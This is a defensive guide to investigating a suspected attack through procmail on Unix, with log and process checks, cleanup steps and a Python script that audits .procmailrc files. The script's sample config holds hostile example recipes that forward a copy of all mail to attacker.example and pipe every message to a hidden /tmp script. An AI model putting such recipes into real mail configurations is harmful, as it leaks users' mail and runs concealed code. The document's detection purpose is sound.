
Procmail Attack Analysis

TL;DR

This guide helps you investigate a potential attack targeting your Unix system’s procmail process. We’ll cover identifying suspicious activity, examining logs, and cleaning up compromised configurations.

1. Identify Suspicious Activity

  1. Check Running Processes: Use ps to look for unusual procmail instances or processes spawned by procmail that don’t match expected behaviour.
    ps aux | grep procmail

    Look for high CPU usage, unexpected command-line arguments, or processes running as a different user than usual.

  2. Monitor System Logs: Examine /var/log/syslog (or your system’s equivalent) for errors related to procmail.
    grep -i procmail /var/log/syslog

    Pay attention to messages about failed deliveries, unexpected script executions, or permission issues.

  3. Network Connections: Use netstat or ss to see if procmail is making any unusual network connections.
    netstat -tunp | grep procmail   # no -l: that flag lists only listening sockets and would hide outbound connections

    Unexpected outbound connections could indicate a compromised process sending spam or exfiltrating data.

2. Examine Procmail Configuration Files

  1. Locate Configuration Files: The main configuration file is typically ~/.procmailrc for each user. System-wide configurations might be in /etc/procmailrc or similar locations.
  2. Review .procmailrc Contents: Carefully inspect the contents of each .procmailrc file for suspicious entries.
    • Look for unexpected forwarding addresses or scripts.
    • Check for lines that execute external commands without proper validation.
    • Be wary of complex filtering rules that might be used to hide malicious activity.
  3. Identify Suspicious Scripts: If your .procmailrc file calls external scripts, examine those scripts for malicious code.
    grep -nE '^[[:space:]]*[|!]' ~/.procmailrc

    This lists the action lines that pipe a message to a command (`|`) or forward it to an address (`!`); examine every script or address they reference.
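As an added example (not part of the original guide), a small Python audit that applies this section's checks to a .procmailrc: it parses each `:0` recipe and flags pipe actions (`|`), forward actions (`!`) and INCLUDERC lines, ranking unconditional recipes and anything under a temp directory highest. The sample rc file, address and paths are constructed for the demo.

```python
# Constructed sample .procmailrc for this example; paths and addresses are invented.
SAMPLE_PROCMAILRC = """\
MAILDIR=$HOME/Mail
INCLUDERC=/tmp/.cache/extra.rc
# legitimate: file list traffic into a folder
:0:
* ^List-Id:.*debian-security
$MAILDIR/lists/debian-security
# suspicious: a silent copy of every message forwarded off-site
:0 c
! mailbox@attacker.example
# suspicious: every message piped to a script hidden in /tmp
:0
| /tmp/.x/run.sh
"""
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_procmailrc(text):
    """Return (recipes, includes); each recipe holds its flags, conditions and action line."""
    recipes, includes, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith(":0"):
            flags = line[2:].split(":", 1)[0].strip()  # flags precede an optional lockfile
            cur = {"flags": flags, "conditions": [], "action": None}
            recipes.append(cur)
        elif cur is not None and cur["action"] is None:
            if line.startswith("*"):
                cur["conditions"].append(line[1:].strip())
            else:
                cur["action"] = line  # first non-condition line is the action
        elif line.startswith("INCLUDERC="):
            includes.append(line.split("=", 1)[1].strip())
    return recipes, includes

def audit_procmailrc(text):
    """Flag recipes that run commands or forward mail; unconditional ones and temp paths rank HIGH."""
    recipes, includes = parse_procmailrc(text)
    findings = [("HIGH" if i.startswith(TEMP_DIRS) else "MEDIUM", "INCLUDERC pulls in " + i) for i in includes]
    for r in recipes:
        act = r["action"] or ""
        if act[:1] in ("|", "!"):  # plain mailbox delivery or a nested block is not flagged here
            kind = "pipes to command" if act[0] == "|" else "forwards to"
            target = act[1:].strip()
            sev = "HIGH" if not r["conditions"] or target.startswith(TEMP_DIRS) else "MEDIUM"
            note = " (copy of every message, 'c' flag)" if "c" in r["flags"] and not r["conditions"] else ""
            findings.append((sev, f"recipe {kind} {target}{note}"))
    return findings
```

Run `audit_procmailrc(open(path).read())` against each user's rc file and review every HIGH finding by hand; a conditional pipe to a mail filter such as a spam scanner is normal and lands at MEDIUM.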

3. Investigate Mail Logs

  1. Check Mail Delivery Logs: Examine your mail server's logs (e.g., Postfix, Sendmail) for messages related to the affected users.
    Look for bounced emails, delivery failures, or unusual email patterns.
  2. Examine Mail Queues: Check the mail queue for stuck or suspicious messages.
    mailq

    This can reveal if an attacker is attempting to use your system as a relay.

4. Clean Up Compromised Configurations

  1. Remove Suspicious Entries: Delete any malicious entries from the .procmailrc files.
    Be careful not to remove legitimate configurations accidentally. Back up the original file before making changes.
  2. Replace Compromised Scripts: Replace any compromised scripts with clean versions.
    If you are unsure, delete the script entirely and reconfigure procmail without it.
  3. Reset User Passwords: If a user account has been compromised, reset their password immediately.
  4. Scan for Rootkits: Run a rootkit scanner to ensure that the system hasn't been further compromised.
    sudo apt-get install rkhunter # Example on Debian/Ubuntu

    Then run

    sudo rkhunter --checkall   # a full check needs root to read system binaries and kernel state
  5. Update System: Ensure your system is fully patched with the latest security updates.

5. Further Analysis (Optional)

  1. Packet Capture: If you suspect network activity, capture network traffic using tools like tcpdump or Wireshark to analyze communication patterns.
    sudo tcpdump -i eth0 port 25 # Example capturing SMTP traffic on interface eth0
  2. Memory Dump: In advanced cases, you might need to perform a memory dump of the procmail process for detailed analysis. This requires specialized tools and expertise.